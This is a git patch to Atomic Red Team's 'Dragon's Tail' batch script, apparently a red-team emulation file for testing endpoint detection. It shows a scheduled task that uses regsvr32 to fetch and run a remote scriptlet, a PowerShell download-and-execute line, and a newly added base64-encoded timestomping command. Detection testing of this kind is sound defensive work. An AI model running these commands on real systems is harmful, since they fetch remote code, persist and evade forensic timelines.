From 2da4ce1e9b4e33008f61f9ceb155ca2b3dba2811 Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Wed, 29 Nov 2017 11:21:48 -0700
Subject: [PATCH] Fix Dragon's Tail .bat

---
 .../chain_reaction_DragonsTail.bat               | 16 +++++++++++++---
 1 file changed, 13 insertions(+), 3 deletions(-)

diff --git a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
index 201697c5..6e710763 100644
--- a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+++ b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
@@ -11,6 +11,8 @@
 
 SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
 
+SCHTASKS /Run /TN "Atomic Testing"
+
 SCHTASKS /Delete /TN "Atomic Testing" /F
 
 :: Tactics: Execution
@@ -21,12 +23,20 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
 :: Tactics: Defense Evasion
 :: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
 :: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
+:: To Encode A Command
+:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
+:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
+:: $EncodedText =[Convert]::ToBase64String($Bytes)
+:: $EncodedText
 
 echo "Atomic Test File" > test.txt
-PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
+
+::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
+
+PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
 
 :: Tactics: Defense Evasion
 :: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
 
-:: Deletes File, detection here would be File Modificaiton
-del test.txt
+:: Deletes File, detection here would be File Modification
+::del test.txt